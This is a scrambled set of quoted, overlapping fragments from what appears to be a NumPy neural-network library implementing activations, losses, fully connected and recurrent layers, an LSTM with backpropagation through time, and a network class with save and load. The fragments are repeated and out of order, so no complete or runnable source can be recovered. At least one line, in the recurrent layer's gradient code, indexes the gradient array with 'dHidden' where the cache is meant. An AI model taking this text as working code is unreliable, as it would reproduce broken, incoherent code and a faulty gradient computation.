"self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class LSTM: ''' Long Short Term Memory", "import numpy as np class tanh: def __call__(self, input): return np.tanh(input) def d(self,", "''' Fully Connected layer ''' shape = None weights = None activation =", "self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t] # activations dAct[t, :, 0:3 *", "0 else h0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t]", "previous = None activation = None def __init__(self, shape, activation=identity()): self.shape = shape", "matrices is a sum of tensor products of columns and rows of the", "function ''' return 1 class softmax_loss: ''' To be used in combination with", ":, -1] = 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] =", "= np.zeros([batch, 
self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache is", "self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations,", "# dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t] dC_previous +=", "outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps,", "dIn[t] = cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] *", "* self.shape[1]] = forget_bias_init self.previous = None self.cell = None def reset(self): self.previous", "np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class", "dH[-1] += dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t]", "def d(self, probs, train_on=None): ''' it computes the softmax loss derivative for optimality", "self.shape[1]]) for t in range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t, :, :]", "raws, 'outputs': outputs} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs =", "init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1])", "outputs = cache['outputs'] time_steps, batch, out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput =", "input): return 1 class mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2)", "tmp_[range(train_on.size), train_on] -= 1 return tmp_ class rNet: layers = [] num_of_layers =", "self.shape[1]] * previous_cell + \\ activations[t, :, 0:self.shape[1]] * activations[t, :, 3 *", "class FC: ''' Fully Connected layer ''' shape = None weights = None", "batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache is not", "None weights = None previous = None cell = None 
def __init__(self, shape):", ":, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs, 'outputs':", "self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None)", "C_previous, dC_previous = (cell[t - 1], dCell[t - 1]) if t > 0", "dAct = dOut[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients over", "''' the following line sums the gradients over the entire batch proof: Let", "''' out = input for l in self.layers: out = l(out) return out", "0 def __call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor):", "time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + 1]) outputs", "input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] +", "cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not", "return exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None): ''' it returns", "def reset(self): for l in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self,", "in combination with sofmax ''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def", "out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l]", "mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def", "input): ''' input is to be a rank 3 tensor ''' out =", "+ self.shape[1]) * scale self.weights[-1,] = 0 def __call__(self, input_tensor): out, _ =", "= np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch, 
self.shape[1]]) for t in range(0,", "return outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch, in_ = input.shape", "__call__(self, input): return input def d(self, input): return 1 class mean_square: def __call__(self,", "def __call__(self, input): shifted_ = input - np.max(input) exp_ = np.exp(shifted_) return exp_", "class mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True)", "= np.zeros([batch, self.shape[1]]) for t in range(0, time_steps): previous = outputs[t - 1]", "identity: def __call__(self, input): return input def d(self, input): return 1 class mean_square:", "np.zeros([batch, self.shape[1]]) for t in range(0, time_steps): previous = outputs[t - 1] if", "dIn, None class FCr: ''' Fully Connected recursive layer ''' shape = None", "= np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0 is None: c0 = np.zeros([batch,", "else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = {", "self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t] dC_previous += activations[t, :, self.shape[1]:2 *", "2) * activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * dH[t] # dout", "self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells': cells,", "cells[t - 1] if t > 0 else c0 inputs[t, :, -1] =", "inputs[t, :, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 *", "scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) *", "out = inputs for l in range(0, self.num_of_layers()): if cache0 is not None", "of tensor products of columns and rows of the respected matrices ''' dW", "def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) 
self.cell = np.copy(cache['cn']) self.previous", "following line sums the gradients over the entire batch proof: Let x be", "in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + 1]) outputs = np.zeros([time_steps,", "columns and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t]", "4 * self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] = 0 if", "4 * self.shape[1]]) if c0 is None: c0 = np.zeros([batch, self.shape[1]]) if h0", "= None activation = None def reset(self): pass def __init__(self, shape, activation=identity()): self.shape", "= None self.cell = None def reset(self): self.previous = None self.cell = None", "t > 0 else c0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]]", "dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i dAct[t, :,", "= np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch, in_", "batch, out_ = out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0 for t in", "cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out def eval_for_back_prop(self, input_tensor, h0=None):", "self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *= (1.0 - activations[t, :, 3 *", "= np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] *", "return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): ''' it computes the softmax loss", "= C_previous * dCell[t] dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t]", "class rNet: layers = [] num_of_layers = None def __init__(self): self.num_of_layers = lambda:", "def load(self, path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC:", "np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]]) if 
h0 is None: h0", "* self.shape[1]] = 1. / (1. + np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :,", "eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch, in_ = input.shape inputs = np.zeros([time_steps,", "= None def __init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self, input): ''' input", "t in range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t, :, :] inputs[t, :,", "def d(self, input_1, input_2): return (input_1 - input_2) / np.size(input_1) class softmax: '''", "time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_", "previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws,", "= cache['activations'] cell_act = cache['cells_act'] cell = cache['cells'] c0 = cache['c0'] time_steps, batch,", "= dOut.copy() if dCache is not None: dH[-1] += np.copy(dH['dHidden']) for t in", "- 1] if t > 0 else dh0 dh += dInput[t, :, self.shape[0]:-1]", ":, -1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs':", "* self.num_of_layers() cache_out = [None] * self.num_of_layers() out = inputs for l in", "gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product Now, we have", "def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None]", "return 1 - input * input class sigmoid: def __call__(self, input): return 1", "= np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch,", "previous = None cell = None def __init__(self, shape): self.shape = shape def", "in cache[l] else None} time_steps, batch, out_ = out.shape dIn = np.zeros([time_steps, batch,", "outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch, 
in_ = input.shape inputs", "the softmax loss derivative for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -=", "softmax loss derivative for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1", "outputs = np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]]) for t in", "dAct[t, :, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t] # activations", "''' shape = None weights = None previous = None cell = None", "the gradients over the entire batch proof: Let x be a single input", "batch proof: Let x be a single input and dY a single gradient", "layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None] * self.num_of_layers()", "self.shape[1]] * dH[t] # dout dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] =", "time_steps, batch, in_ = input.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] +", "= [None] * self.num_of_layers() cache_out = [None] * self.num_of_layers() out = inputs for", "None, 'h0': cache[l]['hn'] if 'hn' in cache[l] else None} time_steps, batch, out_ =", "activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) /", "inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1]", "proof: Let x be a single input and dY a single gradient Than", "0:3 * self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]] dAct[t, :, 3 *", "* self.shape[1]] * dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t, :, 3", "elif cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l]", "Fully Connected layer ''' shape = None weights = None activation = None", "input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out def 
eval_for_back_prop(self,", "t in reversed(range(0, time_steps)): dAct = dOut[t] * self.activation.d(outputs[t]) ''' the following line", "two matrices is a sum of tensor products of columns and rows of", "previous_cell + \\ activations[t, :, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:] cells_act[t]", "None previous = None activation = None def __init__(self, shape, activation=identity()): self.shape =", "- input) class identity: def __call__(self, input): return input def d(self, input): return", "d(self, probs, train_on=None): ''' it returns 1, as the derivative is covered by", "forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous = None", "= np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache", "np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache is not None: dCell[-1] += dCache['dCell']", "shape self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] +", "seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = np.random.randn(self.shape[0] + self.shape[1]", "'raws': raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None):", "dH = next_grad.copy() if dCache is not None: dCell[-1] += dCache['dCell'] dH[-1] +=", "None and cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0']", "tensor ''' out = input for l in self.layers: out = l(out) return", "softmax_loss: ''' To be used in combination with sofmax ''' def __call__(self, input,", "= None def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn'])", "self.shape[1] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) cells = 
np.zeros([time_steps, batch, self.shape[1]])", "out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out, cache[l] =", "the following line sums the gradients over the entire batch proof: Let x", "* self.shape[1]]) if c0 is None: c0 = np.zeros([batch, self.shape[1]]) if h0 is", "cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] *", "for l in self.layers: l.init() def reset(self): for l in self.layers: l.reset() def", "rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T)", "Fully Connected recursive layer ''' shape = None weights = None previous =", "it computes the softmax loss derivative for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size),", "dCell[t] dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i dAct[t,", "np.exp(-input)) def d(self, input): return input * (1 - input) class identity: def", "t > 0 else h0 previous_cell = cells[t - 1] if t >", "dout dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t] C_previous,", "probs, train_on=None): ''' it returns 1, as the derivative is covered by a", "not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out,", "is a sum of tensor products of columns and rows of the respected", "= np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt( self.shape[0] +", "dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t] ** 2)", "None} time_steps, batch, out_ = out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0 for", "* self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous = (cell[t - 1], dCell[t", "cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] * self.num_of_layers() for", "outputs.shape dW = 
np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0", "dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0, 'dCell': dc0}", "in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully Connected layer ''' shape", "for t in range(0, time_steps): previous = outputs[t - 1] if t >", "self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1, :]", "= np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0", "dAct = dH[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients over", ":, 0:3 * self.shape[1]] = 1. / (1. + np.exp(-raws_[:, 0:3 * self.shape[1]]))", "rows In other words, a product of two matrices is a sum of", "def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch,", "reset(self): self.previous = None def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous", "np class tanh: def __call__(self, input): return np.tanh(input) def d(self, input): return 1", "inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights)", "* dCell[t] dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i", "is precisely the matrix product dW=x.T*dY where x holds x_i as its rows", "for l in range(0, self.num_of_layers()): if cache0 is not None and cache0[l] is", "inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs} def", "matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :,", "+= activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]]", "* 
scale self.weights[-1, :] = 0 def reset(self): self.previous = None def __call__(self,", "raws = np.zeros([time_steps, batch, self.shape[1]]) for t in range(0, time_steps): inputs[t, :, 0:-1]", "dW=x.T*dY where x holds x_i as its rows and dY holds dY_i as", "section 2.2 ''' self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1])", "cache['cells_act'] cell = cache['cells'] c0 = cache['c0'] time_steps, batch, out_ = outputs.shape dAct", "input_2): return (input_1 - input_2) / np.size(input_1) class softmax: ''' Only to be", "outputs = np.zeros([time_steps, batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]])", "def init(self, forget_bias_init=3): ''' forget bias initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf", "d(self, input): return 1 class mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1 -", "return input * (1 - input) class identity: def __call__(self, input): return input", "= np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_ class rNet: layers = []", "predictions, cache0=None, cost=softmax_loss()): cache = [None] * self.num_of_layers() cache_out = [None] * self.num_of_layers()", "None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out,", "in range(0, time_steps): previous = outputs[t - 1] if t > 0 else", "cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] =", "cache0[l] is not None: if cache0[l]['c0'] is not None and cache0[l]['h0'] is not", "* self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous = (cell[t -", "{'dHidden': dh0} class LSTM: ''' Long Short Term Memory layer Paper can be", "input - np.max(input) exp_ = np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True) def", "= np.zeros_like(self.weights) for t 
in reversed(range(0, time_steps)): dAct = dOut[t] * self.activation.d(outputs[t]) '''", "None: c0 = np.zeros([batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]])", "self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache", "reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW =", "None and cache0[l] is not None: if cache0[l]['c0'] is not None and cache0[l]['h0']", "- 1], dCell[t - 1]) if t > 0 else (c0, dc0) #", "cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_ = outputs.shape", "* self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :, 3 * self.shape[1]:] = activations[t,", "cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_ = inputs.shape", "of the respected matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t]", "self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,] = 0 def __call__(self,", "= shape def init(self, forget_bias_init=3): ''' forget bias initialization as seen in the", "np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps, batch, 4", "self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None] * self.num_of_layers() cache_out", "activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0]", "- np.max(input) exp_ = np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self,", "2) ''' the following line sums the gradients over the entire batch proof:", "= forget_bias_init self.previous = None self.cell = None def reset(self): self.previous = None", "h0=self.previous) self.cell = 
np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None,", "eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0]", "else None, 'h0': cache[l]['hn'] if 'hn' in cache[l] else None} time_steps, batch, out_", "- 1] if t > 0 else c0 inputs[t, :, -1] = 1", "respected matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t,", "if cache0 is not None and cache0[l] is not None: if cache0[l]['c0'] is", "return 1 class mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2) /", "(path,i)) class FC: ''' Fully Connected layer ''' shape = None weights =", "cache['cells'] c0 = cache['c0'] time_steps, batch, out_ = outputs.shape dAct = np.zeros(activations.shape) dW", "respected matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW,", "self.num_of_layers()): if cache0 is not None and cache0[l] is not None: if cache0[l]['c0']", "cache[l] else None} time_steps, batch, out_ = out.shape dIn = np.zeros([time_steps, batch, out_])", "shape = None weights = None activation = None def reset(self): pass def", "is not None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for t in reversed(range(0,", "c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input,", "holds dY_i as its rows In other words, a product of two matrices", "np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,] =", "dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] if t > 0 else", "* self.shape[1]:3 * self.shape[1]] * dH[t] # dout dAct[t, :, 2 * self.shape[1]:3", "self.shape[1]]) if c0 is None: c0 = np.zeros([batch, self.shape[1]]) if h0 is None:", "+= dCache['dCell'] dH[-1] += 
dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t] += (1", ":, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t]", "input_1, input_2): return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def d(self, input_1, input_2):", "in_ = inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t", "''' Long Short Term Memory layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf '''", "else None} time_steps, batch, out_ = out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0", "# dwrite_c dAct[t, :, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t]", "*= (1.0 - activations[t, :, 0:3 * self.shape[1]]) * activations[t, :, 0:3 *", "2, axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1 - input_2) / np.size(input_1) class", "np.zeros([time_steps, batch, out_]) loss=0 for t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t])", "batch, self.shape[0] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch,", "def d(self, input): return 1 - input * input class sigmoid: def __call__(self,", ":, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]]", "self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache is not None:", "out = input for l in self.layers: out = l(out) return out def", "dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t])", "if 'cn' in cache[l] else None, 'h0': cache[l]['hn'] if 'hn' in cache[l] else", "\\ activations[t, :, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t])", "= np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = 
np.zeros([batch,", "3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t, :, 2 * self.shape[1]:3", "1 - input * input class sigmoid: def __call__(self, input): return 1 /", ":] = 0 def reset(self): self.previous = None def __call__(self, input_tensor): out, cache", "= input_tensor[t, :, :] inputs[t, :, -1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t]", "0:3 * self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *= (1.0 - activations[t, :,", "dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] *", "np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1])", "self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1,", "* self.shape[1]] * dH[t] # dout dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]]", "(1 - input) class identity: def __call__(self, input): return input def d(self, input):", "range(0, time_steps): previous = outputs[t - 1] if t > 0 else h0", "= None def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell =", "np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t", "2 * self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs,", "cache['c0'] time_steps, batch, out_ = outputs.shape dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput", "= np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH", "0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous = None self.cell =", "= activations[t, :, 3 * self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :, 3", "is None: c0 = np.zeros([batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch,", "LSTM: ''' Long Short Term Memory 
layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf", "Connected recursive layer ''' shape = None weights = None previous = None", "out def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps,", "dW, cache_out def save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path):", "time_steps): inputs[t, :, 0:-1] = input_tensor[t, :, :] inputs[t, :, -1] = 1", "np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None): ''' it returns 1, as the", "cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs = cache['outputs']", "activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * dH[t] # dout dAct[t, :,", "= np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) raws = np.zeros([time_steps, batch, self.shape[1]])", "+ 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act", "'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn':", "the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1,", "l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully Connected layer ''' shape = None", "cache = [None] * self.num_of_layers() cache_out = [None] * self.num_of_layers() out = inputs", "= self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn'] if 'cn' in cache[l] else None,", "train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): ''' it computes the softmax", "self.layers: out = l(out) return out def init(self): for l in self.layers: l.init()", "np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) ''' the", "t 
